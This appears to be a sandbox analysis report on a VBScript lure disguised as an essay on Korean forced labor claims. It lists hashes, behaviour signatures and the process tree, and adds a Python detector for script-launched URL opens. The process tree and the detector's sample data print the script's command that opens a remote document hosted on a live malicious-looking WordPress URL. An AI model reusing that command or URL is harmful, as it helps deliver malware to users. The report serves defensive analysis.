Analysis
- max time kernel: 241s
- max time network: 275s
- platform: windows11-21h2_x64
- resource: win11-20240412-en
- resource tags: arch:x64, arch:x86, image:win11-20240412-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 20/04/2024, 06:42
Static task
- static1
Behavioral tasks (all on the sample "Essay on Resolution of Korean Forced Labor Claims.vbs")
- behavioral1: resource win7-20240221-en
- behavioral2: resource win10-20240404-en
- behavioral3: resource win10v2004-20240412-en
- behavioral4: resource win11-20240412-en
General
- Target: Essay on Resolution of Korean Forced Labor Claims.vbs
- Size: 27KB
- MD5: 75ec9f68a5b62705c115db5119a78134
- SHA1: 6209f948992fd18d4fc6fc6f89d9815369ac8931
- SHA256: ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
- SHA512: 82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
- SSDEEP: 384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  flow | pid  | Process
  9    | 1644 | WScript.exe
  10   | 1644 | WScript.exe
  13   | 1644 | WScript.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  description       | ioc                                                                   | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  | msedge.exe
  Key opened        | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                    | msedge.exe
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid  | Process             | occurrences
  2092 | msedge.exe          | 2
  2836 | msedge.exe          | 2
  3608 | msedge.exe          | 2
  992  | identity_helper.exe | 2
  1656 | msedge.exe          | 4
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  pid 2836 msedge.exe, 6 occurrences
- Suspicious use of FindShellTrayWindow (25 IoCs)
  pid 2836 msedge.exe, 25 occurrences
- Suspicious use of SendNotifyMessage (12 IoCs)
  pid 2836 msedge.exe, 12 occurrences
- Suspicious use of WriteProcessMemory (64 IoCs)
  pid  | Process      | wrote to memory of (procid_target) | occurrences
  1644 | WScript.exe  | 1956 (78)                          | 2
  1956 | cmd.exe      | 4544 (80)                          | 2
  3804 | explorer.exe | 2836 (82)                          | 2
  2836 | msedge.exe   | 1372 (85)                          | 2
  2836 | msedge.exe   | 764 (86)                           | 38
  2836 | msedge.exe   | 2092 (87)                          | 2
  2836 | msedge.exe   | 4864 (88)                          | 14
Processes
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Essay on Resolution of Korean Forced Labor Claims.vbs"
  PID: 1644
  Signatures: Blocklisted process makes network request; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
    PID: 1956
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\explorer.exe
      Command line: explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
      PID: 4544
- C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  PID: 3804
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
    PID: 2836
    Signatures: Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
    - msedge.exe (crashpad-handler)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd42be3cb8,0x7ffd42be3cc8,0x7ffd42be3cd8
      PID: 1372
    - msedge.exe (gpu-process)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2
      PID: 764
    - msedge.exe (utility: network.mojom.NetworkService)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
      PID: 2092
      Signatures: Suspicious behavior: EnumeratesProcesses
    - msedge.exe (utility: storage.mojom.StorageService)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
      PID: 4864
    - msedge.exe (renderer, client id 6)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
      PID: 4172
    - msedge.exe (renderer, client id 5)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
      PID: 3740
    - msedge.exe (renderer, client id 7)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:1
      PID: 4348
    - msedge.exe (renderer, instant process, client id 8)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
      PID: 4268
    - msedge.exe (utility: chrome.mojom.UtilWin)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3936 /prefetch:8
      PID: 3608
      Signatures: Suspicious behavior: EnumeratesProcesses
    - msedge.exe (renderer, client id 10)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1
      PID: 4596
    - msedge.exe (renderer, instant process, client id 11)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
      PID: 4736
    - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5612 /prefetch:8
      PID: 992
      Signatures: Suspicious behavior: EnumeratesProcesses
    - msedge.exe (gpu-process, second instance)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,14832185898251107777,5227339259610177367,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3852 /prefetch:2
      PID: 1656
      Signatures: Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2152
- C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 2424
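The only action the script is seen taking in this run is the chain WScript.exe (1644) -> cmd.exe (1956) -> explorer.exe (4544) with a URL to a .docx as the sole argument, and the browser that actually fetches that URL (msedge.exe 2836) sits under a separate, COM-activated explorer.exe (3804, /factory ... -Embedding) rather than under the script host. The following is an added detection example written for this page, not tria.ge's own logic or code from the sample: it walks process-creation records shaped like Sysmon Event ID 1 / 4688 fields, flags explorer.exe launched with a URL anywhere below a script host, and then ties the detached browser tree back to it by matching the URL. PIDs and command lines are taken from the report's process tree; the parent PIDs of the two root processes, the user desktop shell (PID 1000) and the benign control entry (PID 5000) are constructed for the example.

```python
"""Flag script-host -> shell -> explorer.exe URL launches and correlate the browser tree.

Added example. Records are modelled on Sysmon EID 1 / 4688 fields; sample PIDs and
command lines come from the report, root parent PIDs and the benign control are constructed.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
BROWSERS = {"msedge.exe", "chrome.exe", "firefox.exe", "iexplore.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, e.g. 'wscript.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: dict) -> list:
    """[self, parent, grandparent, ...]; stops at a missing parent or a PID cycle (PID reuse)."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def find_script_url_launches(events) -> list:
    """One hit per explorer.exe started with a URL argument somewhere below a script host."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if image_name(ev.image) != "explorer.exe":
            continue
        m = URL_RE.search(ev.cmdline)
        if m is None:
            continue
        chain = ancestry(ev.pid, by_pid)
        host_idx = next((i for i, a in enumerate(chain[1:], 1)
                         if image_name(a.image) in SCRIPT_HOSTS), None)
        if host_idx is None:
            continue  # a user opening a link from the desktop shell lands here
        path = chain[:host_idx + 1]  # explorer.exe up to and including the script host
        hits.append({
            "url": m.group(0),
            "script_host_pid": chain[host_idx].pid,
            "via_shell": any(image_name(a.image) in SHELLS for a in path[1:-1]),
            "chain": [image_name(a.image) for a in reversed(path)],
        })
    return hits


def browsers_for_url(events, url: str) -> list:
    """PIDs of top-level browser processes whose command line carries the same URL.

    The browser is not a child of the script host: the URL is handed to the shell's
    COM-activated instance (explorer.exe /factory,... -Embedding), which starts the
    browser as a separate tree. Chromium child processes (--type=...) are skipped
    because only the launcher process carries the URL.
    """
    return [e.pid for e in events
            if image_name(e.image) in BROWSERS and url in e.cmdline and "--type=" not in e.cmdline]


URL = "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

SAMPLE_EVENTS = [
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),  # constructed: user's desktop shell
    ProcEvent(1644, 1000, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Essay on Resolution of Korean Forced Labor Claims.vbs"'),
    ProcEvent(1956, 1644, r"C:\Windows\System32\cmd.exe", f'"C:\\Windows\\System32\\cmd.exe" /c explorer "{URL}"'),
    ProcEvent(4544, 1956, r"C:\Windows\explorer.exe", f'explorer "{URL}"'),
    ProcEvent(3804, 700, r"C:\Windows\explorer.exe",  # parent PID constructed
              r"C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"),
    ProcEvent(2836, 3804, EDGE, f'"{EDGE}" --single-argument {URL}'),
    ProcEvent(2092, 2836, EDGE, f'"{EDGE}" --type=utility --utility-sub-type=network.mojom.NetworkService'),
    ProcEvent(5000, 1000, r"C:\Windows\explorer.exe", 'explorer "https://example.invalid/docs"'),  # constructed benign control
]


if __name__ == "__main__":
    for hit in find_script_url_launches(SAMPLE_EVENTS):
        print(" -> ".join(hit["chain"]), hit["url"],
              "browser PIDs:", browsers_for_url(SAMPLE_EVENTS, hit["url"]))
```

Run against the sample records this reports one chain, wscript.exe -> cmd.exe -> explorer.exe, for the share.docx URL and resolves it to browser PID 2836; the constructed user-initiated link open (PID 5000) is not flagged because no script host is above it. The URL match is the piece that matters for triage here: without it the Edge tree under the /factory explorer.exe looks like ordinary user browsing, and the WScript.exe tree looks like it opened nothing.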
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 152B
  MD5: 0fcda4fac8ec713700f95299a89bc126
  SHA1: 576a818957f882dc0b892a29da15c4bb71b93455
  SHA256: f7a257742d3a6e6edd16ac8c4c4696d4bdf653041868329461444a0973e71430
  SHA512: ab350ca508c412ff860f82d25ac7492afb3baf4a2827249ebc7ec9632ee444f8f0716389f0623afc0756f395cf00d7a90a0f89b360acdf72b1befe34eecb5986
- Filesize: 152B
  MD5: 21986fa2280bae3957498a58adf62fc2
  SHA1: d01ad69975b7dc46eba6806783450f987fa2b48d
  SHA256: c91d76b0f27ccea28c4f5f872dee6a98f2d37424ef0b5f188af8c6757090cbb5
  SHA512: ae9ba1abe7def7f6924d486a58427f04a02af7dd82aa3a36c1ed527a23ec7897f00b0e30f22529e9599ae2db88e8abc7ba8013b426885aa3c961ee74678455f1
- Filesize: 498B
  MD5: d9a4069147eda85efebb239ac0ab0b43
  SHA1: 5f2e5e906d980417b06c1eefd126e35d8b12e754
  SHA256: 08ae5ab00e602ebfb0fd533ea03eb337942df45fb05ab0e43d3dd7ecb665ba0c
  SHA512: a5370396ecbedcce98a3e84af7332ce08d53ff83c0e97ae36ae9f2a98e504104f67208ce006580c2fd29754552b39d74b707b7426b7c88a176979c014b4ed24a
- Filesize: 5KB
  MD5: 76b480b2e0e3b42b456223b7a799a34a
  SHA1: e9b776fe6f99f3c7bd7f08d0632bd44948ecd807
  SHA256: a1992889c9c3d96da3e186d50c6b38e89e35420230f0244bd08987b73dcdf99b
  SHA512: afe2c8f586de32b42c92fcfcccf40d21db7f617d6582de12cf6fc86214cce7a1312666958996d3202b15c50e0c6c6c8e1ae88048a8473e866dfbf5f65c6d4b91
- Filesize: 6KB
  MD5: 10da995855ecdb5edbd4f16a477330ac
  SHA1: 378f7a7acaca3da56360719cbca6785f9c176b0c
  SHA256: 8b4d1eccdf2d5bc04657d5d6a7aac590dde924073076946b6fa25168f0244028
  SHA512: a35078caac06185fdcc295eb6a2ce347ee14a53444a4e7363b6dd1cf9c1b71cf9c59b2dde4240ca74c860288042b969b99ece7ff02f4580d8306adee736dc6e1
- Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
- Filesize: 11KB
  MD5: da7c30b2726c0316742a5836d5ce80b3
  SHA1: 1323123429abb0856675cce750b147e6c855c162
  SHA256: 71f575319e2e6289a4950d2655dfdf1bc3894a4627a998d13e529698c0df524c
  SHA512: 4965e873650d2d6fd16d21c34172144dd5dd69e4d145f3db38d7d56e9baeebe157f38980134cbd4006c0a1ca8f3c9a48817ea38bfe032fa0c2b883a6b31d4ee7